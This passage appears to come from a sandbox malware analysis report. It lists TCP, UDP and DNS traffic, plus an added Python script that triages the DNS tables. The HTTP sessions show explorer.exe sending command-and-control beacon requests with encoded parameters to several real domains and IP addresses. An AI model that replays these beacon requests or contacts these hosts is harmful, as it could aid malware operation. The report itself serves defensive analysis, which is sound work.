Sep 27, 2021 17:32:08.474483967 CEST | 49167 | 80 | 192.168.2.22 | 216.172.172.208
Sep 27, 2021 17:32:08.475579977 CEST | 80 | 49167 | 216.172.172.208 | 192.168.2.22
Sep 27, 2021 17:32:08.475658894 CEST | 49167 | 80 | 192.168.2.22 | 216.172.172.208
Sep 27, 2021 17:32:08.614156961 CEST | 80 | 49167 | 216.172.172.208 | 192.168.2.22
Sep 27, 2021 17:32:18.621284962 CEST | 49168 | 80 | 192.168.2.22 | 162.0.229.241
Sep 27, 2021 17:32:18.784785032 CEST | 80 | 49168 | 162.0.229.241 | 192.168.2.22
Sep 27, 2021 17:32:18.784881115 CEST | 49168 | 80 | 192.168.2.22 | 162.0.229.241
Sep 27, 2021 17:32:18.785186052 CEST | 49168 | 80 | 192.168.2.22 | 162.0.229.241
Sep 27, 2021 17:32:18.948822021 CEST | 80 | 49168 | 162.0.229.241 | 192.168.2.22
Sep 27, 2021 17:32:18.948857069 CEST | 80 | 49168 | 162.0.229.241 | 192.168.2.22
Sep 27, 2021 17:32:18.949249029 CEST | 49168 | 80 | 192.168.2.22 | 162.0.229.241
Sep 27, 2021 17:32:18.949389935 CEST | 49168 | 80 | 192.168.2.22 | 162.0.229.241
Sep 27, 2021 17:32:19.124420881 CEST | 80 | 49168 | 162.0.229.241 | 192.168.2.22
Sep 27, 2021 17:32:23.974770069 CEST | 49169 | 80 | 192.168.2.22 | 162.0.232.162
Sep 27, 2021 17:32:24.140935898 CEST | 80 | 49169 | 162.0.232.162 | 192.168.2.22
Sep 27, 2021 17:32:24.141038895 CEST | 49169 | 80 | 192.168.2.22 | 162.0.232.162
Sep 27, 2021 17:32:24.141268015 CEST | 49169 | 80 | 192.168.2.22 | 162.0.232.162
Sep 27, 2021 17:32:24.307697058 CEST | 80 | 49169 | 162.0.232.162 | 192.168.2.22
Sep 27, 2021 17:32:24.308247089 CEST | 49169 | 80 | 192.168.2.22 | 162.0.232.162
Sep 27, 2021 17:32:24.472944975 CEST | 80 | 49169 | 162.0.232.162 | 192.168.2.22
Sep 27, 2021 17:32:24.971518993 CEST | 80 | 49169 | 162.0.232.162 | 192.168.2.22
Sep 27, 2021 17:32:24.971777916 CEST | 49169 | 80 | 192.168.2.22 | 162.0.232.162
Sep 27, 2021 17:32:29.437037945 CEST | 49170 | 80 | 192.168.2.22 | 216.239.32.21
Sep 27, 2021 17:32:29.449552059 CEST | 80 | 49170 | 216.239.32.21 | 192.168.2.22
Sep 27, 2021 17:32:29.449654102 CEST | 49170 | 80 | 192.168.2.22 | 216.239.32.21
Sep 27, 2021 17:32:29.450268984 CEST | 49170 | 80 | 192.168.2.22 | 216.239.32.21
Sep 27, 2021 17:32:29.462723017 CEST | 80 | 49170 | 216.239.32.21 | 192.168.2.22
Sep 27, 2021 17:32:29.531821966 CEST | 80 | 49170 | 216.239.32.21 | 192.168.2.22
Sep 27, 2021 17:32:29.531872034 CEST | 80 | 49170 | 216.239.32.21 | 192.168.2.22
Sep 27, 2021 17:32:29.531902075 CEST | 80 | 49170 | 216.239.32.21 | 192.168.2.22
Sep 27, 2021 17:32:29.531925917 CEST | 80 | 49170 | 216.239.32.21 | 192.168.2.22
Sep 27, 2021 17:32:29.531981945 CEST | 80 | 49170 | 216.239.32.21 | 192.168.2.22
Sep 27, 2021 17:32:29.532022953 CEST | 49170 | 80 | 192.168.2.22 | 216.239.32.21
Sep 27, 2021 17:32:29.532075882 CEST | 80 | 49170 | 216.239.32.21 | 192.168.2.22
Sep 27, 2021 17:32:29.532104969 CEST | 80 | 49170 | 216.239.32.21 | 192.168.2.22
Sep 27, 2021 17:32:29.532128096 CEST | 80 | 49170 | 216.239.32.21 | 192.168.2.22
Sep 27, 2021 17:32:29.532143116 CEST | 49170 | 80 | 192.168.2.22 | 216.239.32.21
Sep 27, 2021 17:32:29.532151937 CEST | 80 | 49170 | 216.239.32.21 | 192.168.2.22
Sep 27, 2021 17:32:29.532176971 CEST | 80 | 49170 | 216.239.32.21 | 192.168.2.22
Sep 27, 2021 17:32:29.532182932 CEST | 49170 | 80 | 192.168.2.22 | 216.239.32.21
Sep 27, 2021 17:32:29.532246113 CEST | 49170 | 80 | 192.168.2.22 | 216.239.32.21
Sep 27, 2021 17:32:29.544748068 CEST | 80 | 49170 | 216.239.32.21 | 192.168.2.22
Sep 27, 2021 17:32:29.545041084 CEST | 49170 | 80 | 192.168.2.22 | 216.239.32.21
Sep 27, 2021 17:32:29.546432018 CEST | 80 | 49170 | 216.239.32.21 | 192.168.2.22
Sep 27, 2021 17:32:29.546521902 CEST | 49170 | 80 | 192.168.2.22 | 216.239.32.21
Sep 27, 2021 17:32:29.546693087 CEST | 80 | 49170 | 216.239.32.21 | 192.168.2.22
Sep 27, 2021 17:32:29.546752930 CEST | 49170 | 80 | 192.168.2.22 | 216.239.32.21
Sep 27, 2021 17:32:29.546894073 CEST | 80 | 49170 | 216.239.32.21 | 192.168.2.22
Sep 27, 2021 17:32:29.546921015 CEST | 80 | 49170 | 216.239.32.21 | 192.168.2.22
Sep 27, 2021 17:32:29.546953917 CEST | 49170 | 80 | 192.168.2.22 | 216.239.32.21
Sep 27, 2021 17:32:29.546981096 CEST | 49170 | 80 | 192.168.2.22 | 216.239.32.21
Sep 27, 2021 17:32:29.547769070 CEST | 80 | 49170 | 216.239.32.21 | 192.168.2.22
Sep 27, 2021 17:32:29.547871113 CEST | 49170 | 80 | 192.168.2.22 | 216.239.32.21
Sep 27, 2021 17:32:29.548048019 CEST | 80 | 49170 | 216.239.32.21 | 192.168.2.22
Sep 27, 2021 17:32:29.548121929 CEST | 49170 | 80 | 192.168.2.22 | 216.239.32.21
                                                                  Sep 27, 2021 17:32:29.548507929 CEST8049170216.239.32.21192.168.2.22
                                                                  Sep 27, 2021 17:32:29.548538923 CEST8049170216.239.32.21192.168.2.22
                                                                  Sep 27, 2021 17:32:29.548590899 CEST4917080192.168.2.22216.239.32.21
                                                                  Sep 27, 2021 17:32:29.548613071 CEST4917080192.168.2.22216.239.32.21
                                                                  Sep 27, 2021 17:32:29.549474001 CEST8049170216.239.32.21192.168.2.22
                                                                  Sep 27, 2021 17:32:29.549506903 CEST8049170216.239.32.21192.168.2.22
                                                                  Sep 27, 2021 17:32:29.549559116 CEST4917080192.168.2.22216.239.32.21
                                                                  Sep 27, 2021 17:32:29.549582005 CEST4917080192.168.2.22216.239.32.21
                                                                  Sep 27, 2021 17:32:29.550220013 CEST8049170216.239.32.21192.168.2.22
                                                                  Sep 27, 2021 17:32:29.550304890 CEST4917080192.168.2.22216.239.32.21
                                                                  Sep 27, 2021 17:32:29.550311089 CEST8049170216.239.32.21192.168.2.22
                                                                  Sep 27, 2021 17:32:29.550389051 CEST4917080192.168.2.22216.239.32.21
                                                                  Sep 27, 2021 17:32:29.551467896 CEST8049170216.239.32.21192.168.2.22
                                                                  Sep 27, 2021 17:32:29.551501989 CEST8049170216.239.32.21192.168.2.22
                                                                  Sep 27, 2021 17:32:29.551544905 CEST4917080192.168.2.22216.239.32.21
                                                                  Sep 27, 2021 17:32:29.551579952 CEST4917080192.168.2.22216.239.32.21
                                                                  Sep 27, 2021 17:32:29.552293062 CEST8049170216.239.32.21192.168.2.22
                                                                  Sep 27, 2021 17:32:29.552325964 CEST8049170216.239.32.21192.168.2.22

                                                                  UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 27, 2021 17:31:56.314769983 CEST | 52167 | 53 | 192.168.2.22 | 8.8.8.8
Sep 27, 2021 17:31:56.350986958 CEST | 53 | 52167 | 8.8.8.8 | 192.168.2.22
Sep 27, 2021 17:32:01.560457945 CEST | 50591 | 53 | 192.168.2.22 | 8.8.8.8
Sep 27, 2021 17:32:01.602639914 CEST | 53 | 50591 | 8.8.8.8 | 192.168.2.22
Sep 27, 2021 17:32:07.176561117 CEST | 57805 | 53 | 192.168.2.22 | 8.8.8.8
Sep 27, 2021 17:32:07.350603104 CEST | 53 | 57805 | 8.8.8.8 | 192.168.2.22
Sep 27, 2021 17:32:13.513216972 CEST | 59030 | 53 | 192.168.2.22 | 8.8.8.8
Sep 27, 2021 17:32:13.579324961 CEST | 53 | 59030 | 8.8.8.8 | 192.168.2.22
Sep 27, 2021 17:32:18.581300020 CEST | 59185 | 53 | 192.168.2.22 | 8.8.8.8
Sep 27, 2021 17:32:18.620323896 CEST | 53 | 59185 | 8.8.8.8 | 192.168.2.22
Sep 27, 2021 17:32:23.948707104 CEST | 55616 | 53 | 192.168.2.22 | 8.8.8.8
Sep 27, 2021 17:32:23.973058939 CEST | 53 | 55616 | 8.8.8.8 | 192.168.2.22
Sep 27, 2021 17:32:29.351190090 CEST | 49972 | 53 | 192.168.2.22 | 8.8.8.8
Sep 27, 2021 17:32:29.435094118 CEST | 53 | 49972 | 8.8.8.8 | 192.168.2.22
Sep 27, 2021 17:32:39.564275026 CEST | 51771 | 53 | 192.168.2.22 | 8.8.8.8
Sep 27, 2021 17:32:39.821504116 CEST | 53 | 51771 | 8.8.8.8 | 192.168.2.22
Sep 27, 2021 17:32:45.154223919 CEST | 59867 | 53 | 192.168.2.22 | 8.8.8.8
Sep 27, 2021 17:32:45.198246956 CEST | 53 | 59867 | 8.8.8.8 | 192.168.2.22
Sep 27, 2021 17:33:08.122895002 CEST | 50315 | 53 | 192.168.2.22 | 8.8.8.8
Sep 27, 2021 17:33:08.168354034 CEST | 53 | 50315 | 8.8.8.8 | 192.168.2.22
Sep 27, 2021 17:33:11.236748934 CEST | 50072 | 53 | 192.168.2.22 | 8.8.8.8
Sep 27, 2021 17:33:11.279463053 CEST | 53 | 50072 | 8.8.8.8 | 192.168.2.22

                                                                  DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Sep 27, 2021 17:31:56.314769983 CEST | 192.168.2.22 | 8.8.8.8 | 0x8eb8 | Standard query (0) | www.wwiilive.com | A (IP address) | IN (0x0001)
Sep 27, 2021 17:32:01.560457945 CEST | 192.168.2.22 | 8.8.8.8 | 0xc18c | Standard query (0) | www.dunedinhyperlocal.com | A (IP address) | IN (0x0001)
Sep 27, 2021 17:32:07.176561117 CEST | 192.168.2.22 | 8.8.8.8 | 0xfc43 | Standard query (0) | www.oinfoproduto.com | A (IP address) | IN (0x0001)
Sep 27, 2021 17:32:13.513216972 CEST | 192.168.2.22 | 8.8.8.8 | 0x9c63 | Standard query (0) | www.institutosamar.com | A (IP address) | IN (0x0001)
Sep 27, 2021 17:32:18.581300020 CEST | 192.168.2.22 | 8.8.8.8 | 0x30e0 | Standard query (0) | www.multicoininvestment.com | A (IP address) | IN (0x0001)
Sep 27, 2021 17:32:23.948707104 CEST | 192.168.2.22 | 8.8.8.8 | 0x9037 | Standard query (0) | www.theseattlenotary.com | A (IP address) | IN (0x0001)
Sep 27, 2021 17:32:29.351190090 CEST | 192.168.2.22 | 8.8.8.8 | 0xce43 | Standard query (0) | www.petersonmovingco.com | A (IP address) | IN (0x0001)
Sep 27, 2021 17:32:39.564275026 CEST | 192.168.2.22 | 8.8.8.8 | 0xb02b | Standard query (0) | www.quinnwebster.top | A (IP address) | IN (0x0001)
Sep 27, 2021 17:32:45.154223919 CEST | 192.168.2.22 | 8.8.8.8 | 0x43f4 | Standard query (0) | www.lianxiwan.xyz | A (IP address) | IN (0x0001)
Sep 27, 2021 17:33:08.122895002 CEST | 192.168.2.22 | 8.8.8.8 | 0x9ff7 | Standard query (0) | www.lianxiwan.xyz | A (IP address) | IN (0x0001)
Sep 27, 2021 17:33:11.236748934 CEST | 192.168.2.22 | 8.8.8.8 | 0x1d11 | Standard query (0) | www.area-arquitectos.com | A (IP address) | IN (0x0001)

                                                                  DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Sep 27, 2021 17:31:56.350986958 CEST | 8.8.8.8 | 192.168.2.22 | 0x8eb8 | No error (0) | www.wwiilive.com | wwiilive.com | - | CNAME (Canonical name) | IN (0x0001)
Sep 27, 2021 17:31:56.350986958 CEST | 8.8.8.8 | 192.168.2.22 | 0x8eb8 | No error (0) | wwiilive.com | - | 34.102.136.180 | A (IP address) | IN (0x0001)
Sep 27, 2021 17:32:01.602639914 CEST | 8.8.8.8 | 192.168.2.22 | 0xc18c | No error (0) | www.dunedinhyperlocal.com | dunedinhyperlocal.com | - | CNAME (Canonical name) | IN (0x0001)
Sep 27, 2021 17:32:01.602639914 CEST | 8.8.8.8 | 192.168.2.22 | 0xc18c | No error (0) | dunedinhyperlocal.com | - | 184.168.131.241 | A (IP address) | IN (0x0001)
Sep 27, 2021 17:32:07.350603104 CEST | 8.8.8.8 | 192.168.2.22 | 0xfc43 | No error (0) | www.oinfoproduto.com | oinfoproduto.com | - | CNAME (Canonical name) | IN (0x0001)
Sep 27, 2021 17:32:07.350603104 CEST | 8.8.8.8 | 192.168.2.22 | 0xfc43 | No error (0) | oinfoproduto.com | - | 216.172.172.208 | A (IP address) | IN (0x0001)
Sep 27, 2021 17:32:13.579324961 CEST | 8.8.8.8 | 192.168.2.22 | 0x9c63 | Name error (3) | www.institutosamar.com | none | none | A (IP address) | IN (0x0001)
Sep 27, 2021 17:32:18.620323896 CEST | 8.8.8.8 | 192.168.2.22 | 0x30e0 | No error (0) | www.multicoininvestment.com | multicoininvestment.com | - | CNAME (Canonical name) | IN (0x0001)
Sep 27, 2021 17:32:18.620323896 CEST | 8.8.8.8 | 192.168.2.22 | 0x30e0 | No error (0) | multicoininvestment.com | - | 162.0.229.241 | A (IP address) | IN (0x0001)
Sep 27, 2021 17:32:23.973058939 CEST | 8.8.8.8 | 192.168.2.22 | 0x9037 | No error (0) | www.theseattlenotary.com | theseattlenotary.com | - | CNAME (Canonical name) | IN (0x0001)
Sep 27, 2021 17:32:23.973058939 CEST | 8.8.8.8 | 192.168.2.22 | 0x9037 | No error (0) | theseattlenotary.com | - | 162.0.232.162 | A (IP address) | IN (0x0001)
Sep 27, 2021 17:32:29.435094118 CEST | 8.8.8.8 | 192.168.2.22 | 0xce43 | No error (0) | www.petersonmovingco.com | - | 216.239.32.21 | A (IP address) | IN (0x0001)
Sep 27, 2021 17:32:29.435094118 CEST | 8.8.8.8 | 192.168.2.22 | 0xce43 | No error (0) | www.petersonmovingco.com | - | 216.239.34.21 | A (IP address) | IN (0x0001)
Sep 27, 2021 17:32:29.435094118 CEST | 8.8.8.8 | 192.168.2.22 | 0xce43 | No error (0) | www.petersonmovingco.com | - | 216.239.38.21 | A (IP address) | IN (0x0001)
Sep 27, 2021 17:32:29.435094118 CEST | 8.8.8.8 | 192.168.2.22 | 0xce43 | No error (0) | www.petersonmovingco.com | - | 216.239.36.21 | A (IP address) | IN (0x0001)
Sep 27, 2021 17:32:39.821504116 CEST | 8.8.8.8 | 192.168.2.22 | 0xb02b | No error (0) | www.quinnwebster.top | quinnwebster.top | - | CNAME (Canonical name) | IN (0x0001)
Sep 27, 2021 17:32:39.821504116 CEST | 8.8.8.8 | 192.168.2.22 | 0xb02b | No error (0) | quinnwebster.top | - | 162.251.85.174 | A (IP address) | IN (0x0001)
Sep 27, 2021 17:32:45.198246956 CEST | 8.8.8.8 | 192.168.2.22 | 0x43f4 | No error (0) | www.lianxiwan.xyz | - | 101.35.124.222 | A (IP address) | IN (0x0001)
Sep 27, 2021 17:33:08.168354034 CEST | 8.8.8.8 | 192.168.2.22 | 0x9ff7 | No error (0) | www.lianxiwan.xyz | - | 101.35.124.222 | A (IP address) | IN (0x0001)
Sep 27, 2021 17:33:11.279463053 CEST | 8.8.8.8 | 192.168.2.22 | 0x1d11 | No error (0) | www.area-arquitectos.com | - | 93.185.100.223 | A (IP address) | IN (0x0001)
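
The script below is an added triage example, not part of the Joe Sandbox report. It re-enters the DNS Queries and DNS Answers tables above as constructed Python data, follows each CNAME chain to its final A records, flags the NXDOMAIN answer, measures the gap between consecutive lookups (the loader walks its domain list a few seconds apart, with one repeat of www.lianxiwan.xyz) and maps every answered address back to the name that was actually queried so that the HTTP sessions further down can be labelled by hostname. The session tuples passed to `label_sessions` are taken from the HTTP Packets section; everything else (function names, record layout) is our choice.

```python
"""Added example: triage the DNS Queries / DNS Answers tables of this report."""
from datetime import datetime

# Constructed from the DNS Queries table: (timestamp, transaction id, queried name).
QUERIES = [
    ("Sep 27, 2021 17:31:56.314769983 CEST", 0x8eb8, "www.wwiilive.com"),
    ("Sep 27, 2021 17:32:01.560457945 CEST", 0xc18c, "www.dunedinhyperlocal.com"),
    ("Sep 27, 2021 17:32:07.176561117 CEST", 0xfc43, "www.oinfoproduto.com"),
    ("Sep 27, 2021 17:32:13.513216972 CEST", 0x9c63, "www.institutosamar.com"),
    ("Sep 27, 2021 17:32:18.581300020 CEST", 0x30e0, "www.multicoininvestment.com"),
    ("Sep 27, 2021 17:32:23.948707104 CEST", 0x9037, "www.theseattlenotary.com"),
    ("Sep 27, 2021 17:32:29.351190090 CEST", 0xce43, "www.petersonmovingco.com"),
    ("Sep 27, 2021 17:32:39.564275026 CEST", 0xb02b, "www.quinnwebster.top"),
    ("Sep 27, 2021 17:32:45.154223919 CEST", 0x43f4, "www.lianxiwan.xyz"),
    ("Sep 27, 2021 17:33:08.122895002 CEST", 0x9ff7, "www.lianxiwan.xyz"),
    ("Sep 27, 2021 17:33:11.236748934 CEST", 0x1d11, "www.area-arquitectos.com"),
]
# Constructed from the DNS Answers table: (transaction id, reply code, name, type, target).
# Reply code 3 is "Name error" (NXDOMAIN); that row carries no usable target.
ANSWERS = [
    (0x8eb8, 0, "www.wwiilive.com", "CNAME", "wwiilive.com"),
    (0x8eb8, 0, "wwiilive.com", "A", "34.102.136.180"),
    (0xc18c, 0, "www.dunedinhyperlocal.com", "CNAME", "dunedinhyperlocal.com"),
    (0xc18c, 0, "dunedinhyperlocal.com", "A", "184.168.131.241"),
    (0xfc43, 0, "www.oinfoproduto.com", "CNAME", "oinfoproduto.com"),
    (0xfc43, 0, "oinfoproduto.com", "A", "216.172.172.208"),
    (0x9c63, 3, "www.institutosamar.com", "A", None),
    (0x30e0, 0, "www.multicoininvestment.com", "CNAME", "multicoininvestment.com"),
    (0x30e0, 0, "multicoininvestment.com", "A", "162.0.229.241"),
    (0x9037, 0, "www.theseattlenotary.com", "CNAME", "theseattlenotary.com"),
    (0x9037, 0, "theseattlenotary.com", "A", "162.0.232.162"),
    (0xce43, 0, "www.petersonmovingco.com", "A", "216.239.32.21"),
    (0xce43, 0, "www.petersonmovingco.com", "A", "216.239.34.21"),
    (0xce43, 0, "www.petersonmovingco.com", "A", "216.239.38.21"),
    (0xce43, 0, "www.petersonmovingco.com", "A", "216.239.36.21"),
    (0xb02b, 0, "www.quinnwebster.top", "CNAME", "quinnwebster.top"),
    (0xb02b, 0, "quinnwebster.top", "A", "162.251.85.174"),
    (0x43f4, 0, "www.lianxiwan.xyz", "A", "101.35.124.222"),
    (0x9ff7, 0, "www.lianxiwan.xyz", "A", "101.35.124.222"),
    (0x1d11, 0, "www.area-arquitectos.com", "A", "93.185.100.223"),
]


def parse_ts(text):
    """'Sep 27, 2021 17:31:56.314769983 CEST' -> datetime (nanoseconds cut to microseconds)."""
    stamp, frac = text.rsplit(" ", 1)[0].split(".")
    return datetime.strptime(f"{stamp}.{frac[:6]}", "%b %d, %Y %H:%M:%S.%f")


def resolve(tid, name):
    """Follow CNAME records inside one transaction until A records are reached."""
    rows = [r for r in ANSWERS if r[0] == tid]
    chain, seen = [name], {name}
    if any(r[1] == 3 for r in rows):
        return chain, []                        # NXDOMAIN: nothing to follow
    while True:
        a_recs = [r[4] for r in rows if r[2] == chain[-1] and r[3] == "A"]
        if a_recs:
            return chain, a_recs
        cnames = [r[4] for r in rows if r[2] == chain[-1] and r[3] == "CNAME"]
        if not cnames or cnames[0] in seen:     # dangling or looping CNAME
            return chain, []
        seen.add(cnames[0])
        chain.append(cnames[0])


def dns_triage():
    """Per queried name: how often it was asked, its CNAME chain and the final IPs."""
    out = {}
    for _, tid, name in QUERIES:
        chain, ips = resolve(tid, name)
        rec = out.setdefault(name, {"queries": 0, "chain": chain, "ips": ips})
        rec["queries"] += 1
    return out


def query_gaps():
    """Seconds between consecutive lookups: the cadence at which the domain list is walked."""
    times = [parse_ts(q[0]) for q in QUERIES]
    return [round((b - a).total_seconds(), 1) for a, b in zip(times, times[1:])]


def ip_to_name():
    """Answered A address -> the www name that was actually queried."""
    return {ip: name for name, rec in dns_triage().items() for ip in rec["ips"]}


def label_sessions(sessions):
    """[(session id, destination IP)] -> [(session id, ip, queried name or None)]."""
    names = ip_to_name()
    return [(sid, ip, names.get(ip)) for sid, ip in sessions]


if __name__ == "__main__":
    for name, rec in dns_triage().items():
        print(f"{name:28} x{rec['queries']} {' -> '.join(rec['chain'])} {rec['ips'] or 'NXDOMAIN'}")
    print("gaps between lookups (s):", query_gaps())
    # Destination IPs of HTTP sessions 0 and 5 from the HTTP Packets section.
    for row in label_sessions([(0, "34.102.136.180"), (5, "216.239.32.21")]):
        print(row)
```

Running it lists one line per queried name (www.institutosamar.com shows as NXDOMAIN, www.petersonmovingco.com with its four Google-hosted addresses), the gaps between lookups, and session 5's destination 216.239.32.21 labelled www.petersonmovingco.com; the address-to-name map is what you would feed into proxy or firewall log searches, since the TCP rows above carry only IPs.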

                                                                  HTTP Request Dependency Graph

                                                                  • www.wwiilive.com
                                                                  • www.dunedinhyperlocal.com
                                                                  • www.oinfoproduto.com
                                                                  • www.multicoininvestment.com
                                                                  • www.theseattlenotary.com
                                                                  • www.petersonmovingco.com
                                                                  • www.quinnwebster.top

                                                                  HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.22 | 49165 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Sep 27, 2021 17:31:56.380229950 CEST | 0 | OUT | GET /u4an/?a8a=O6e4vnipWHrd6Lz&1bxhyLu=2wrG/oaPoZN58JamjsocLLaSsZCLAXvYnHaXxYH/bF19vnAo7muls9VTY9bzjfrYRlsEFw== HTTP/1.1
                                                                  Host: www.wwiilive.com
                                                                  Connection: close
                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                  Data Ascii:
Sep 27, 2021 17:31:56.559993982 CEST | 1 | IN | HTTP/1.1 403 Forbidden
                                                                  Server: openresty
                                                                  Date: Mon, 27 Sep 2021 15:31:56 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 275
                                                                  ETag: "6151bf8f-113"
                                                                  Via: 1.1 google
                                                                  Connection: close
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                  Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.22 | 49166 | 184.168.131.241 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Sep 27, 2021 17:32:01.790482998 CEST | 2 | OUT | GET /u4an/?1bxhyLu=QzQ5ef7X9Qx2RFxJxLuAV3Nyo+3E4vM7eDKYIH9lLMMMsSlhTFVhOgGCly15LXQ6PZbXEA==&a8a=O6e4vnipWHrd6Lz HTTP/1.1
                                                                  Host: www.dunedinhyperlocal.com
                                                                  Connection: close
                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                  Data Ascii:
Sep 27, 2021 17:32:02.171308994 CEST | 2 | IN | HTTP/1.1 301 Moved Permanently
                                                                  Server: nginx/1.20.1
                                                                  Date: Mon, 27 Sep 2021 15:32:02 GMT
                                                                  Content-Type: text/html; charset=utf-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Location: https://www.dunedinhyperlocal.com/u4an/?1bxhyLu=QzQ5ef7X9Qx2RFxJxLuAV3Nyo+3E4vM7eDKYIH9lLMMMsSlhTFVhOgGCly15LXQ6PZbXEA==&a8a=O6e4vnipWHrd6Lz
                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.22 | 49167 | 216.172.172.208 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Sep 27, 2021 17:32:07.491132975 CEST | 3 | OUT | GET /u4an/?a8a=O6e4vnipWHrd6Lz&1bxhyLu=iGR+5Iun3qB2MqfdIYMGDL0AT8nSBE6bMfK6r+1aL2UXxRazRBC9SoS0x9BZPXZuDFcMhw== HTTP/1.1
                                                                  Host: www.oinfoproduto.com
                                                                  Connection: close
                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                  Data Ascii:
Sep 27, 2021 17:32:08.474100113 CEST | 3 | IN | HTTP/1.1 301 Moved Permanently
                                                                  Date: Mon, 27 Sep 2021 15:32:07 GMT
                                                                  Server: Apache
                                                                  X-UA-Compatible: IE=edge
                                                                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                  Cache-Control: no-cache, must-revalidate, max-age=0
                                                                  X-Redirect-By: WordPress
                                                                  Upgrade: h2,h2c
                                                                  Connection: Upgrade, close
                                                                  Location: http://oinfoproduto.com/u4an/?a8a=O6e4vnipWHrd6Lz&1bxhyLu=iGR+5Iun3qB2MqfdIYMGDL0AT8nSBE6bMfK6r+1aL2UXxRazRBC9SoS0x9BZPXZuDFcMhw==
                                                                  Content-Length: 0
                                                                  Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.22 | 49168 | 162.0.229.241 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Sep 27, 2021 17:32:18.785186052 CEST | 4 | OUT | GET /u4an/?a8a=O6e4vnipWHrd6Lz&1bxhyLu=IweMS5AD1Z8aBlnPYfnQfVfd8bpTLSXzmKGHl0Em7c4kxOia/Ddx83+xf6gfPzYK0colLA== HTTP/1.1
                                                                  Host: www.multicoininvestment.com
                                                                  Connection: close
                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                  Data Ascii:
Sep 27, 2021 17:32:18.948822021 CEST | 6 | IN | HTTP/1.1 301 Moved Permanently
                                                                  keep-alive: timeout=5, max=100
                                                                  content-type: text/html
                                                                  content-length: 707
                                                                  date: Mon, 27 Sep 2021 15:32:18 GMT
                                                                  server: LiteSpeed
                                                                  location: https://www.multicoininvestment.com/u4an/?a8a=O6e4vnipWHrd6Lz&1bxhyLu=IweMS5AD1Z8aBlnPYfnQfVfd8bpTLSXzmKGHl0Em7c4kxOia/Ddx83+xf6gfPzYK0colLA==
                                                                  x-turbo-charged-by: LiteSpeed
                                                                  connection: close
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 